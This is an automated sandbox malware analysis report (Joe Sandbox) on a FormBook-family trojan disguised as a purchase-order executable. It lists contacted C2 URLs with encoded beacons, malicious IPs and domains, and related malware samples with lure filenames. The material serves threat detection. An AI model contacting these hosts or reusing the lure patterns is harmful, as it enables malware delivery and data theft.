http://www.newegg.club/z6yq/?GLvL=i6ILStp&3Vh=IJnefPGbAG2krK+EKqL7a6PcsOn2aPK/WZ9HL1Dz7m/jpK3dV9N7lfXoIgTZBqqJT6Dwk+2xUIDeSWpocJA6c4hKTPFrc23hpH01F3StVZ8qYYY4ti7AYH4NQlXIhw0jjg== | true | Avira URL Cloud: safe | unknown
http://www.tenmyk.shop/qpp1/ | true | Avira URL Cloud: safe | unknown
http://www.fedegaritech.online/sxrn/?3Vh=70g3synrMt+mv3bMA5M2pxuaxfXYXBcuz2rDMeB4YhlIhpmz1+c2ZYK3A+er04ehZbUUhJrT7mt7qDpgqvLlNMW5io5Y2wz+3pIWYjAXlaRVZqa6aRI+hdIryUt+yvXWOw==&GLvL=i6ILStp | true | Avira URL Cloud: safe | unknown
http://www.isirumah.info/guxl/?3Vh=VQ+MI0uxyUC67v7v1hceC1mX3dJlk0riHoAQ+3GvHNeFtXUu+z+ARRpD7cmGrTRyz64SdCAtvJHCLetkGUIMOH+WZ0Kd1BdS1tdCvwc6ShNqDahWH5yyFSR4U8rJOhuL/g==&GLvL=i6ILStp | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dts.gnpge.com | sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://cdn.consentmanager.net | sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.fedegaritech.online/USC_University_Affiliated_Program.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZ | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.fedegaritech.online/Feeds.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaN5 | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/pics/28903/search.png) | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2 | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://www.fedegaritech.online/Green_Foods_Benefits.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8 | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false | | high
http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf | sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmp | false
                                                          high
                                                          http://www.fedegaritech.online/__media__/design/underconstructionnotice.php?d=fedegaritech.onlinesdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fedegaritech.online/__media__/js/trademark.php?d=fedegaritech.online&type=nssdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              high
                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                high
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePO 20495088.exe, 00000000.00000002.2338435823.0000000002F8A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://delivery.consentmanager.netsdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    high
                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icosdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fedegaritech.online/Fodder.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8rtVBcj5MV0FSaNsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.Fedegaritech.onlinesdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://tenmyk.shop/qpp1/?GLvL=i6ILStp&3Vh=bNhe/DfYfogjOpkpwqpXjWD1WogAMITw7j9LK8VbiMrdvIszvqUx6yAB8sdiagnhost.exe, 00000009.00000002.3900182865.0000000005720000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000004010000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://www.ecosia.org/newtab/sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.fedegaritech.online/Cerebral_Palsy_Types.cfm?fp=QE%2FVIVbZTA68UxRCJqKlhp04zZFGwbOgFJnvyB8sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woffsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ac.ecosia.org/autocomplete?q=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpgsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://i2.cdn-image.com/__media__/pics/29590/bg1.png)sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.ssrnoremt-rise.sbssKyuoUfZdk.exe, 0000000A.00000002.3899309709.0000000001503000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://i2.cdn-image.com/__media__/js/min.js?v2.3sdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sdiagnhost.exe, 00000009.00000003.2776340324.0000000007538000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixsdiagnhost.exe, 00000009.00000002.3901769050.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000009.00000002.3900182865.0000000004F46000.00000004.10000000.00040000.00000000.sdmp, sKyuoUfZdk.exe, 0000000A.00000002.3899874166.0000000003836000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                      high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
13.248.169.48 | www.habitat.rent | United States | 16509 | AMAZON-02US | true
75.2.103.23 | www.urssaf.pro | United States | 16509 | AMAZON-02US | true
203.161.49.193 | www.inspires.website | Malaysia | 45899 | VNPT-AS-VNVNPTCorpVN | true
188.114.97.3 | www.ssrnoremt-rise.sbs | European Union | 13335 | CLOUDFLARENETUS | true
208.91.197.27 | www.fedegaritech.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
3.33.130.190 | livelovechat.live | United States | 8987 | AMAZONEXPANSIONGB | true
149.115.238.44 | www.newegg.club | United States | 174 | COGENT-174US | true
104.21.74.79 | www.tenmyk.shop | United States | 13335 | CLOUDFLARENETUS | true
15.197.204.56 | www.isirumah.info | United States | 7430 | TANDEMUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557623
Start date and time: 2024-11-18 13:51:56 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 53s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO 20495088.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/7@9/9
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 113
• Number of non-executed functions: 284
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with a delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: PO 20495088.exe
No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
13.248.169.48 | Quotation request -30112024_pdf.exe | malicious | FormBook | www.tals.xyz/010v/
13.248.169.48 | Arrival Notice.exe | malicious | FormBook | www.wajf.net/dkz5/
13.248.169.48 | rG5EzfUhUp.exe | malicious | Sakula RAT | www.polarroute.com/newimage.asp?imageid=zcddwc1730788541&type=0&resid=5322796
13.248.169.48 | dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | malicious | FormBook | www.extrem.tech/ikn1/
13.248.169.48 | Hire P.O.exe | malicious | FormBook | www.sonoscan.org/ew98/
13.248.169.48 | RFQ 3100185 MAHAD.exe | malicious | FormBook | www.hopeisa.live/v0jl/
13.248.169.48 | DHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exe | malicious | FormBook | www.layerzero.cfd/8f5m/
13.248.169.48 | rGO880-PDF.exe | malicious | FormBook | www.reviewpro.shop/aclh/
13.248.169.48 | FOTO#U011eRAFLAR.exe | malicious | FormBook | www.fitlook.shop/34uy/
13.248.169.48 | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | www.dreampay.shop/a18n/?mRu=GNYnn+/HdyV8duRMqtcyXm0xy6A5R7OP0g3qQsxli+rcIWT14zRUDqgxNRAzolcecH8yu9AKKAak4SdSyZ6RvIdAVt2QUT1IwNlPBAoCd8CxXhf8uuYrVNc=&UJ=7H1XM
75.2.103.23 | ENQUIRY LED LIGHTS.pif.exe | malicious | FormBook | www.asklifeclarity.shop/b5w1/
75.2.103.23 | Bill Of Lading_MEDUVB935991.pdf.exe | malicious | FormBook | www.heeraka.info/o7wc/
75.2.103.23 | rDRAWINGDWGSINC.exe | malicious | FormBook | www.webeuz.buzz/pw0n/
75.2.103.23 | quote894590895pdf.exe | malicious | FormBook | www.webeuz.buzz/pw0n/
75.2.103.23 | AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe | malicious | FormBook | www.heeraka.info/o7wc/
75.2.103.23 | PO59458.exe | malicious | FormBook | www.webeuz.buzz/okq4/
203.161.49.193 | Arrival Notice_pdf.exe | malicious | FormBook | www.futurevision.life/hxmz/
203.161.49.193 | PROFORMA INVOICE.exe | malicious | FormBook | www.futurevision.life/hxmz/
203.161.49.193 | Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | FormBook | www.futurevision.life/cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM
203.161.49.193 | Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe | malicious | FormBook, GuLoader
                                                                                                      • www.eco-tops.website/n54u/
                                                                                                      Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.futurevision.life/hxmz/
                                                                                                      DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.harmonid.life/aq3t/
                                                                                                      DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.harmonid.life/aq3t/
                                                                                                      Statement Cargomind 2024-09-12 (K07234).exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.fitlifa.xyz/6tsn/
                                                                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.simplek.top/ep69/
                                                                                                      Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.simplek.top/ep69/
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      www.tenmyk.shopAWB_NO_907853880911.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 104.21.74.79
                                                                                                      www.fedegaritech.onlineDHL SHIPPING CONFIRMATION-SAMPLES DELIVERY ADDRESS.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 208.91.197.27
                                                                                                      Selected_Items.vbsGet hashmaliciousFormBookBrowse
                                                                                                      • 208.91.197.27
                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUSickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.9.44
                                                                                                      NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.69.226
                                                                                                      ickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.69.226
                                                                                                      KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.69.226
                                                                                                      https://lnk.ie/7469O/e=Get hashmaliciousUnknownBrowse
                                                                                                      • 172.66.0.227
                                                                                                      Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                      • 188.114.96.3
                                                                                                      NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.16.123.96
                                                                                                      AMAZON-02USfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 18.244.18.27
                                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 13.248.169.48
                                                                                                      https://discover.smartsheet.com/api/mailings/opened/PMRGSZBCHI2TAOBYGQ4DGMRMEJXXEZZCHIRDKM3GGYYWGZJTFU3DIZDEFU2DEMRUFU4DSNDGFVSTEYZQGYYWIMZSHA3DIIRMEJ3GK4TTNFXW4IR2EI2CELBCONUWOIR2EJ3DSV2VNA4U2V2WL5IGISJWGQZVK2ZTIFXXQ2KUGBUXSSJWPJSXA6DPN5TESQSXJFVESWJ5EJ6Q====.gifGet hashmaliciousUnknownBrowse
                                                                                                      • 44.230.175.247
                                                                                                      900092839283982.exeGet hashmaliciousDBatLoader, VIP KeyloggerBrowse
                                                                                                      • 52.216.214.9
                                                                                                      https://shorturl.at/cQweaGet hashmaliciousUnknownBrowse
                                                                                                      • 13.35.58.119
                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 3.170.115.43
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 54.171.230.55
                                                                                                      http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                      • 52.24.205.146
                                                                                                      AMAZON-02USfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 18.244.18.27
                                                                                                      Quotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 13.248.169.48
                                                                                                      https://discover.smartsheet.com/api/mailings/opened/PMRGSZBCHI2TAOBYGQ4DGMRMEJXXEZZCHIRDKM3GGYYWGZJTFU3DIZDEFU2DEMRUFU4DSNDGFVSTEYZQGYYWIMZSHA3DIIRMEJ3GK4TTNFXW4IR2EI2CELBCONUWOIR2EJ3DSV2VNA4U2V2WL5IGISJWGQZVK2ZTIFXXQ2KUGBUXSSJWPJSXA6DPN5TESQSXJFVESWJ5EJ6Q====.gifGet hashmaliciousUnknownBrowse
                                                                                                      • 44.230.175.247
                                                                                                      900092839283982.exeGet hashmaliciousDBatLoader, VIP KeyloggerBrowse
                                                                                                      • 52.216.214.9
                                                                                                      https://shorturl.at/cQweaGet hashmaliciousUnknownBrowse
                                                                                                      • 13.35.58.119
                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                      • 3.170.115.43
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                      • 18.141.10.107
                                                                                                      harm5.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 54.171.230.55
                                                                                                      http://inscrit.es/Get hashmaliciousUnknownBrowse
                                                                                                      • 52.24.205.146
                                                                                                      VNPT-AS-VNVNPTCorpVNQuotation request -30112024_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.46.205
                                                                                                      Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.49.193
                                                                                                      protected.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 202.92.4.57
                                                                                                      PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 203.161.49.193
                                                                                                      yakuza.arm4.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 14.186.221.243
                                                                                                      yakuza.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 14.248.237.190
                                                                                                      http://weststoneltd.technolutionszzzz.netGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                      • 203.161.41.21
                                                                                                      x86.elfGet hashmaliciousUnknownBrowse
                                                                                                      • 113.189.0.97
